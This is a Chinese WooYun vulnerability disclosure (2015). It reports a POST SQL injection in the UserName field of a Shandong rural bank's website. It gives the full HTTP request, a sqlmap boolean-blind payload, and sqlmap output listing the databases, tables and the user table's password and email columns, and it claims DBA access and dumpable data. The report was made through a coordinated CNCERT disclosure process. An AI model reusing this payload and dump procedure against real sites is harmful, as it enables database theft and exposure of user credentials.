当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143972

漏洞标题:山东省某银行官网POST型SQL注入导致大量敏感信息泄露(DBA权限)

相关厂商:tengzhou.gov.cn

漏洞作者: 路人甲

提交时间:2015-09-28 21:27

修复时间:2015-11-15 16:22

公开时间:2015-11-15 16:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-28: 细节已通知厂商并且等待厂商处理中
2015-10-01: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-11: 细节向核心白帽子及相关领域专家公开
2015-10-21: 细节向普通白帽子公开
2015-10-31: 细节向实习白帽子公开
2015-11-15: 细节向公众公开

简要描述:

SQL注入导致银行数据可被拖库。

详细说明:

山东省滕州农商银行官网存在POST型SQL注入,使得银行数据可被拖库泄露敏感数据。

漏洞证明:

滕州农商行官网地址:http://**.**.**.**/

1滕州主页.png


经过测试,提交如下POST数据,参数UserName存在注入:

POST /wcm/user/add_newuser.jsp HTTP/1.1
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**
Cookie: JSESSIONID=WH3T1BfR4InOfw14O1YVylbXy1tYfL8f2B6fkC4akEBvouITd7g5!1370318643
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Address=3137%20Laguna%20Street&Email=sample%40email.tst&GroupId=0&GroupIds=1&Mobile=987-65-4329&NickName=pengfaxa&Password=g00dPa%24%24w0rD&ReminderAnswer=1&ReminderQuestion=1&Tel=1&TrueName=omcklhve&UserName=qthdqrpf


数据库是Microsoft SQL Server 2000

sqlmap identified the following injection points with a total of 121 HTTP(s) requests:
---
Place: POST
Parameter: UserName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Address=3137 Laguna Street&[email protected]&GroupId=0&GroupIds=1&Mobile=987-65-4329&NickName=pengfaxa&Password=g00dPa$$w0rD&ReminderAnswer=1&ReminderQuestion=1&Tel=1&TrueName=omcklhve&UserName=qthdqrpf' AND 3*2*1=6 AND '000xyfX'='000xyfX' AND 2621=2621 AND 'Wpwg'='Wpwg
---
web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000


一共包含7个数据库:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UserName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Address=3137 Laguna Street&[email protected]&GroupId=0&GroupIds=1&Mobile=987-65-4329&NickName=pengfaxa&Password=g00dPa$$w0rD&ReminderAnswer=1&ReminderQuestion=1&Tel=1&TrueName=omcklhve&UserName=qthdqrpf' AND 3*2*1=6 AND '000xyfX'='000xyfX' AND 2621=2621 AND 'Wpwg'='Wpwg
---
web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] TRSWCM


current-db是TRSWCM,一共包含85表:

web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
current database:    'TRSWCM'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UserName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Address=3137 Laguna Street&[email protected]&GroupId=0&GroupIds=1&Mobile=987-65-4329&NickName=pengfaxa&Password=g00dPa$$w0rD&ReminderAnswer=1&ReminderQuestion=1&Tel=1&TrueName=omcklhve&UserName=qthdqrpf' AND 3*2*1=6 AND '000xyfX'='000xyfX' AND 2621=2621 AND 'Wpwg'='Wpwg
---
web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
Database: TRSWCM
[85 tables]
+---------------------+
| WCMADDRESS          |
| WCMADDRGROUP        |
| WCMADDRGRPMAP       |
| WCMAPPENDIX         |
| WCMBOOKMARK         |
| WCMBULLETIN         |
| WCMCHANNEL          |
| WCMCHANNELSYN       |
| WCMCHNLDOC          |
| WCMCHNLEXTFIELD     |
| WCMCHNLFLOW         |
| WCMCHNLTEMP         |
| WCMCONFIG           |
| WCMCONTACT          |
| WCMCONTENTLINK      |
| WCMCONTGROUP        |
| WCMCONTGRPMAP       |
| WCMDBUPDATE         |
| WCMDOCBAK           |
| WCMDOCKIND          |
| WCMDOCREPLY         |
| WCMDOCSYN           |
| WCMDOCTYPE          |
| WCMDOCUMENT         |
| WCMEVENT            |
| WCMEVENTTYPE        |
| WCMEXCELDATA        |
| WCMEXPIRATION       |
| WCMEXTFIELD         |
| WCMFILETYPE         |
| WCMFLOW             |
| WCMFLOWACTION       |
| WCMFLOWBRANCH       |
| WCMFLOWDOC          |
| WCMFLOWDOCBAK       |
| WCMFLOWMONOPER      |
| WCMFLOWNODE         |
| WCMFLOWNODEOPER     |
| WCMFORMFIELDS       |
| WCMFORMINFO         |
| WCMGROUP            |
| WCMGRPUSER          |
| WCMHITSCOUNT        |
| WCMID               |
| WCMJOB              |
| WCMLOG              |
| WCMLOGTYPE          |
| WCMMARKKIND         |
| WCMMARKSHARE        |
| WCMMEETINGCONT      |
| WCMMEETINGROOM      |
| WCMMEETINGUSER      |
| WCMMESSAGE          |
| WCMMSGQUEUE         |
| WCMOBJTRIGGER       |
| WCMOPER             |
| WCMRELATION         |
| WCMREPLACE          |
| WCMRIGHT            |
| WCMRIGHTDEF         |
| WCMROLE             |
| WCMROLEUSER         |
| WCMSCHEDULE         |
| WCMSECURITY         |
| WCMSITEEXTFIELD     |
| WCMSOURCE           |
| WCMSTATUS           |
| WCMTAGBEANS         |
| WCMTASK             |
| WCMTASKPOOL         |
| WCMTEMPAPDREL       |
| WCMTEMPAPPENDIX     |
| WCMTEMPLATE         |
| WCMTRUSTEEINFO      |
| WCMUSER             |
| WCMUSERSETTING      |
| WCMWEBSITE          |
| WCM_ViewCOLUMNS     |
| X_TEMP              |
| cx                  |
| dtproperties        |
| pangolin_test_table |
| s3_tmp              |
| sysconstraints      |
| syssegments         |
+---------------------+


当前用户buwenwcm是DBA权限

dba用户.png


WCMUSER表中包含用户名、密码邮箱等信息

web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
Database: TRSWCM
Table: WCMUSER
[24 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| ADDRESS          | nvarchar |
| APPLYTIME        | datetime |
| ATTRIBUTE        | nvarchar |
| CRTIME           | datetime |
| CRUSER           | nvarchar |
| EMAIL            | nvarchar |
| IFPUBMYINFO      | tinyint  |
| LOGINTIME        | datetime |
| LOGINTIMES       | int      |
| LOGOUTTIME       | datetime |
| MOBILE           | nvarchar |
| MSGINTERVAL      | smallint |
| NICKNAME         | nvarchar |
| PASSWORD         | nvarchar |
| PRICE            | int      |
| REGTIME          | datetime |
| REMINDERANSWER   | nvarchar |
| REMINDERQUESTION | nvarchar |
| STATUS           | tinyint  |
| TEL              | nvarchar |
| TRUENAME         | nvarchar |
| USERID           | int      |
| USERNAME         | nvarchar |
| VIEWINTERVAL     | smallint |
+------------------+----------+


简单跑了3个用户,示意下,包含用户名、密码邮箱等信息。

3个用户.png


Northwind数据库包含31表:

web server operating system: Windows
web application technology: JSP, Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
Database: Northwind
[31 tables]
+--------------------------------+
| Categories                     |
| CustomerCustomerDemo           |
| CustomerDemographics           |
| Customers                      |
| EmployeeTerritories            |
| Employees                      |
| Invoices                       |
| Orders                         |
| Products                       |
| Region                         |
| Shippers                       |
| Suppliers                      |
| Territories                    |
| Alphabetical list of products  |
| Category Sales for 1997        |
| Current Product List           |
| Customer and Suppliers by City |
| Order Details Extended         |
| Order Details                  |
| Order Subtotals                |
| Orders Qry                     |
| Product Sales for 1997         |
| Products Above Average Price   |
| Products by Category           |
| Quarterly Orders               |
| Sales Totals by Amount         |
| Sales by Category              |
| Summary of Sales by Quarter    |
| Summary of Sales by Year       |
| sysconstraints                 |
| syssegments                    |
+--------------------------------+


pub数据库包含14表

web server operating system: Windows
web application technology: JSP, Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
Database: pubs
[14 tables]
+----------------+
| authors        |
| discounts      |
| employee       |
| jobs           |
| pub_info       |
| publishers     |
| roysched       |
| sales          |
| stores         |
| sysconstraints |
| syssegments    |
| titleauthor    |
| titles         |
| titleview      |
+----------------+


想看哪个数据库随便看,可拖库。
OK,问题证明到此。

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-01 16:20

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置,同时转由CNCERT发山东分中心。

最新状态:

暂无